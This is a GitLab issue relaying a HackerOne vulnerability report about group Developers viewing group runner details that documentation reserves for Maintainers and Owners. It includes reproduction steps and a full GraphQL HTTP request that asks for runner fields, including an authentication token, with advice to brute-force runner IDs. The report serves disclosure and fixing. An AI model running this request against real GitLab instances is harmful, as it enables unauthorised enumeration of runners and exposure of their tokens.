Skip to content

Group Developers can view group runners

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2584372 by ashish_r_padelkar on 2024-07-02, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

Hello,

As per this documentation https://docs.gitlab.com/ee/user/permissions.html, only Maintainers and Owners are allowed to view group runners. However, it is also possible for Group developers to view group runners using this access control issue.

Screenshot_2024-07-02_at_12.19.10_PM.png

Steps to reproduce

1.Create a group and project underneath.
2.Create a group runner here at https://gitlab.com/groups/<GroupName>/-/runners.
3.Add a Developer user at https://gitlab.com/groups/<GroupName>/-/group_members.
4.Login as Developer user.
5.You wont see https://gitlab.com/groups/<GroupName>/-/runners as you do not have access to runners as per documentation and is working as intended.
6. Now run following graphQL query.

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: 1  
Content-Length: 291  
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"  
X-Csrf-Token: 1  
Sec-Ch-Ua-Arch: "arm"  
Sec-Ch-Ua-Platform-Version: "13.2.1"  
Sec-Ch-Ua-Bitness: "64"  
Sec-Ch-Ua-Full-Version-List: "Not/A)Brand";v="8.0.0.0", "Chromium";v="126.0.6478.127", "Google Chrome";v="126.0.6478.127"  
Sec-Ch-Ua-Model: ""  
X-Gitlab-Version: 17.2.0-pre  
Sec-Ch-Ua-Platform: "macOS"  
X-Gitlab-Feature-Category: team_planning  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36  
Content-Type: application/json  
Sec-Ch-Ua-Full-Version: "126.0.6478.127"  
Accept: */*  
Baggage: sentry-environment=gprd,sentry-release=1  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/groupjune2024/projectmay1/-/issues  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-GB,en;q=0.9  
Priority: u=1, i

{"operationName":"getRunnerForRegistration","variables":{"id":"gid://gitlab/Ci::Runner/39635406"},"query":"query getRunnerForRegistration($id: CiRunnerID!) {\n  runner(id: $id) {\n    id\n    description\n    ephemeralAuthenticationToken\n    runnerType\n    __typename\n shortSha\n }\n}\n"}

7.You need to guess/brute force the runner ID in variables parameter above.
8.In response you should see the runner details like description, shortsha, runnertype etc.

What is the current bug behavior?

Developer users are able to view group runner details if they can guesss/bruteforce runner ID which is against their documentation

What is the expected correct behavior?

Only Group Maintainer/Owners should see the group runner details

Output of checks

This bug happens on GitLab.com GitLab Enterprise Edition 17.2.0-pre a257a0aca54

Regards,
Ashish

Impact

Group Developers can view group runners

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: